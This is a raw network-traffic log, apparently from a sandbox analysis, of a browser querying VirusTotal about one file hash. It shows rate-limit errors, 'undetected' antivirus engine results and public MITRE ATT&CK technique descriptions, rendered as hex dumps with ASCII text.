                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 31 30 2e 30 2e 30 2e 31 30 34 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 31 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 76 61 73 74 22 3a 20 7b 0a 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "engine_version": "10.0.0.1040", "engine_update": "20240418", "category": "undetected", "result": null }, "Avast": {
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1152INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 37 2e 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 31 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4e 41 4e 4f 2d 41 6e 74 69 76 69 72 75 73 22 3a 20 7b 0a 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "engine_version": "7.2", "engine_update": "20240418", "category": "undetected", "result": null }, "NANO-Antivirus": {
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1408INData Raw: 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 31 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 6d 73 69 73 6f 66 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f
                                                                                                                                                                                                                    Data Ascii: "engine_update": "20240418", "category": "undetected", "result": null }, "Emsisoft": { "method": "blacklist", "engine_


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    171192.168.2.164992374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC587OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?relationships=item%2Cauthor HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 3d02539f3ee67855b8e002c165d222ee
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:33 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    172192.168.2.164992274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC570OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 660217342b0d742b44e4ae2b11f4c635
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:33 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    173192.168.2.164992574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC570OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mbc_trees HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 8e8b29b76e1acc01870cc14fb785c3c2
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:33 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    174192.168.2.164992474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC965OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTQyMzg4NDA5MzItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTMxLjU5Nw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 1548505de80b4d8bb52dfb9bfeb1d9fd
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:34 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 55373
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:34 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC523INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 41 50 45 20 53 61 6e 64 62 6f 78 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 61 63 74 69 63 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 54 41 30 30 30 37 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 44 69 73 63 6f 76 65 72 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 74 74 61 63 6b 2e 6d 69 74 72 65 2e 6f 72 67 2f 74 61 63 74 69 63 73 2f 54 41 30 30 30 37 2f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: { "data": { "CAPE Sandbox": { "tactics": [ { "id": "TA0007", "name": "Discovery", "link": "https://attack.mitre.org/tactics/TA0007/", "
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC1408INData Raw: 6f 72 65 20 64 65 63 69 64 69 6e 67 20 68 6f 77 20 74 6f 20 61 63 74 2e 20 54 68 65 79 20 61 6c 73 6f 20 61 6c 6c 6f 77 20 61 64 76 65 72 73 61 72 69 65 73 20 74 6f 20 65 78 70 6c 6f 72 65 20 77 68 61 74 20 74 68 65 79 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 61 6e 64 20 77 68 61 74 5c 75 32 30 31 39 73 20 61 72 6f 75 6e 64 20 74 68 65 69 72 20 65 6e 74 72 79 20 70 6f 69 6e 74 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 64 69 73 63 6f 76 65 72 20 68 6f 77 20 69 74 20 63 6f 75 6c 64 20 62 65 6e 65 66 69 74 20 74 68 65 69 72 20 63 75 72 72 65 6e 74 20 6f 62 6a 65 63 74 69 76 65 2e 20 4e 61 74 69 76 65 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 20 74 6f 6f 6c 73 20 61 72 65 20 6f 66 74 65 6e 20 75 73 65 64 20 74 6f 77 61 72 64 20 74 68 69 73 20 70 6f 73 74
                                                                                                                                                                                                                    Data Ascii: ore deciding how to act. They also allow adversaries to explore what they can control and what\u2019s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC544INData Raw: 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 68 6f 61 6d 69 2e 20 49 6e 20 6d 61 63 4f 53 20 61 6e 64 20 4c 69 6e 75 78 2c 20 74 68 65 20 63 75 72 72 65 6e 74 6c 79 20 6c 6f 67 67 65 64 20 69 6e 20 75 73 65 72 20 63 61 6e 20 62 65 20 69 64 65 6e 74 69 66 69 65 64 20 77 69 74 68 20 77 20 61 6e 64 20 77 68 6f 2e 20 4f 6e 20 6d 61 63 4f 53 20 74 68 65 20 64 73 63 6c 20 2e 20 6c 69 73 74 20 2f 55 73 65 72 73 20 7c 20 67 72 65 70 20 2d 76 20 27 5f 27 20 63 6f 6d 6d 61 6e 64 20 63 61 6e 20 61 6c 73 6f 20 62 65 20 75 73 65 64 20 74 6f 20 65 6e 75 6d 65 72 61 74 65 20 75 73 65 72 20 61 63 63 6f 75 6e 74 73 2e 20 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 76 61 72 69 61 62 6c 65 73 2c 20 73 75 63 68 20 61 73 20 25 55 53 45 52 4e 41 4d 45
                                                                                                                                                                                                                    Data Ascii: s information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 76 65 72 69 74 79 22 3a 20 22 55 4e 4b 4e 4f 57 4e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 41 64 76 65 72 73 61 72 69 65 73 20 6d 61 79 20 61 74 74 65 6d 70 74 20 74 6f 20 69 64 65 6e 74 69 66 79 20 74 68 65 20 70 72 69 6d 61 72 79 20 75 73 65 72 2c 20 63 75 72 72 65 6e 74 6c 79 20 6c 6f 67 67 65 64 20 69 6e 20 75 73 65 72 2c 20 73 65 74 20 6f 66 20 75 73 65 72 73 20 74 68 61 74 20 63 6f 6d 6d 6f 6e 6c 79 20 75 73 65 73 20 61 20 73 79 73 74 65 6d 2c 20 6f 72 20 77 68 65 74 68 65 72 20 61 20 75 73 65 72 20 69 73 20 61 63 74 69 76 65 6c 79
                                                                                                                                                                                                                    Data Ascii: "severity": "UNKNOWN", "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC1408INData Raw: 67 65 20 61 20 4e 65 74 77 6f 72 6b 20 44 65 76 69 63 65 20 43 4c 49 20 6f 6e 20 6e 65 74 77 6f 72 6b 20 64 65 76 69 63 65 73 20 74 6f 20 67 61 74 68 65 72 20 64 65 74 61 69 6c 65 64 20 73 79 73 74 65 6d 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 65 2e 67 2e 20 73 68 6f 77 20 76 65 72 73 69 6f 6e 29 2e 20 53 79 73 74 65 6d 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 44 69 73 63 6f 76 65 72 79 20 63 6f 6d 62 69 6e 65 64 20 77 69 74 68 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 67 61 74 68 65 72 65 64 20 66 72 6f 6d 20 6f 74 68 65 72 20 66 6f 72 6d 73 20 6f 66 20 64 69 73 63 6f 76 65 72 79 20 61 6e 64 20 72 65 63 6f 6e 6e 61 69 73 73 61 6e 63 65 20 63 61 6e 20 64 72 69 76 65 20 70 61 79 6c 6f 61 64 20 64 65 76 65 6c 6f 70 6d 65 6e 74 20 61 6e 64 20 63 6f 6e 63 65 61
                                                                                                                                                                                                                    Data Ascii: ge a Network Device CLI on network devices to gather detailed system information (e.g. show version). System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concea
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC1280INData Raw: 67 69 73 74 72 79 20 63 6f 6e 74 61 69 6e 73 20 61 20 73 69 67 6e 69 66 69 63 61 6e 74 20 61 6d 6f 75 6e 74 20 6f 66 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 65 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 2c 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2c 20 73 6f 66 74 77 61 72 65 2c 20 61 6e 64 20 73 65 63 75 72 69 74 79 2e 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 63 61 6e 20 65 61 73 69 6c 79 20 62 65 20 71 75 65 72 69 65 64 20 75 73 69 6e 67 20 74 68 65 20 52 65 67 20 75 74 69 6c 69 74 79 2c 20 74 68 6f 75 67 68 20 6f 74 68 65 72 20 6d 65 61 6e 73 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 52 65 67 69 73 74 72 79 20 65 78 69 73 74 2e 20 53 6f 6d 65 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 6d 61 79 20 68 65
                                                                                                                                                                                                                    Data Ascii: gistry contains a significant amount of information about the operating system, configuration, software, and security. Information can easily be queried using the Reg utility, though other means to access the Registry exist. Some of the information may he
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC1408INData Raw: 61 64 76 65 72 73 61 72 79 2d 63 6f 6e 74 72 6f 6c 6c 65 64 20 63 6f 64 65 20 72 75 6e 6e 69 6e 67 20 6f 6e 20 61 20 6c 6f 63 61 6c 20 6f 72 20 72 65 6d 6f 74 65 20 73 79 73 74 65 6d 2e 20 54 65 63 68 6e 69 71 75 65 73 20 74 68 61 74 20 72 75 6e 20 6d 61 6c 69 63 69 6f 75 73 20 63 6f 64 65 20 61 72 65 20 6f 66 74 65 6e 20 70 61 69 72 65 64 20 77 69 74 68 20 74 65 63 68 6e 69 71 75 65 73 20 66 72 6f 6d 20 61 6c 6c 20 6f 74 68 65 72 20 74 61 63 74 69 63 73 20 74 6f 20 61 63 68 69 65 76 65 20 62 72 6f 61 64 65 72 20 67 6f 61 6c 73 2c 20 6c 69 6b 65 20 65 78 70 6c 6f 72 69 6e 67 20 61 20 6e 65 74 77 6f 72 6b 20 6f 72 20 73 74 65 61 6c 69 6e 67 20 64 61 74 61 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 61 6e 20 61 64 76 65 72 73 61 72 79 20 6d 69 67 68 74 20
                                                                                                                                                                                                                    Data Ascii: adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC1408INData Raw: 2c 20 63 6f 6d 6d 6f 6e 20 70 72 61 63 74 69 63 65 20 75 73 65 73 20 2e 64 79 6c 69 62 20 66 69 6c 65 73 2e 5c 6e 54 68 65 20 57 69 6e 64 6f 77 73 20 6d 6f 64 75 6c 65 20 6c 6f 61 64 65 72 20 63 61 6e 20 62 65 20 69 6e 73 74 72 75 63 74 65 64 20 74 6f 20 6c 6f 61 64 20 44 4c 4c 73 20 66 72 6f 6d 20 61 72 62 69 74 72 61 72 79 20 6c 6f 63 61 6c 20 70 61 74 68 73 20 61 6e 64 20 61 72 62 69 74 72 61 72 79 20 55 6e 69 76 65 72 73 61 6c 20 4e 61 6d 69 6e 67 20 43 6f 6e 76 65 6e 74 69 6f 6e 20 28 55 4e 43 29 20 6e 65 74 77 6f 72 6b 20 70 61 74 68 73 2e 20 54 68 69 73 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 72 65 73 69 64 65 73 20 69 6e 20 4e 54 44 4c 4c 2e 64 6c 6c 20 61 6e 64 20 69 73 20 70 61 72 74 20 6f 66 20 74 68 65 20 57 69 6e 64 6f 77 73 20 4e 61 74
                                                                                                                                                                                                                    Data Ascii: , common practice uses .dylib files.\nThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Nat
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC1280INData Raw: 75 6e 63 74 69 6f 6e 73 20 61 73 20 61 20 6d 65 61 6e 73 20 6f 66 20 65 78 65 63 75 74 69 6e 67 20 62 65 68 61 76 69 6f 72 73 2e 20 53 69 6d 69 6c 61 72 20 74 6f 20 43 6f 6d 6d 61 6e 64 20 61 6e 64 20 53 63 72 69 70 74 69 6e 67 20 49 6e 74 65 72 70 72 65 74 65 72 2c 20 74 68 65 20 6e 61 74 69 76 65 20 41 50 49 20 61 6e 64 20 69 74 73 20 68 69 65 72 61 72 63 68 79 20 6f 66 20 69 6e 74 65 72 66 61 63 65 73 20 70 72 6f 76 69 64 65 20 6d 65 63 68 61 6e 69 73 6d 73 20 74 6f 20 69 6e 74 65 72 61 63 74 20 77 69 74 68 20 61 6e 64 20 75 74 69 6c 69 7a 65 20 76 61 72 69 6f 75 73 20 63 6f 6d 70 6f 6e 65 6e 74 73 20 6f 66 20 61 20 76 69 63 74 69 6d 69 7a 65 64 20 73 79 73 74 65 6d 2e 5c 6e 4e 61 74 69 76 65 20 41 50 49 20 66 75 6e 63 74 69 6f 6e 73 20 28 73 75 63 68
                                                                                                                                                                                                                    Data Ascii: unctions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\nNative API functions (such
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC1408INData Raw: 67 20 6d 6f 6e 69 74 6f 72 65 64 20 66 75 6e 63 74 69 6f 6e 73 20 76 69 61 20 44 69 73 61 62 6c 65 20 6f 72 20 4d 6f 64 69 66 79 20 54 6f 6f 6c 73 2e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 67 6e 61 74 75 72 65 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 76 65 72 69 74 79 22 3a 20 22 55 4e 4b 4e 4f 57 4e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 41 64 76 65 72 73 61 72 69 65 73 20 6d
                                                                                                                                                                                                                    Data Ascii: g monitored functions via Disable or Modify Tools.", "signatures": [ { "severity": "UNKNOWN", "description": "Adversaries m


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
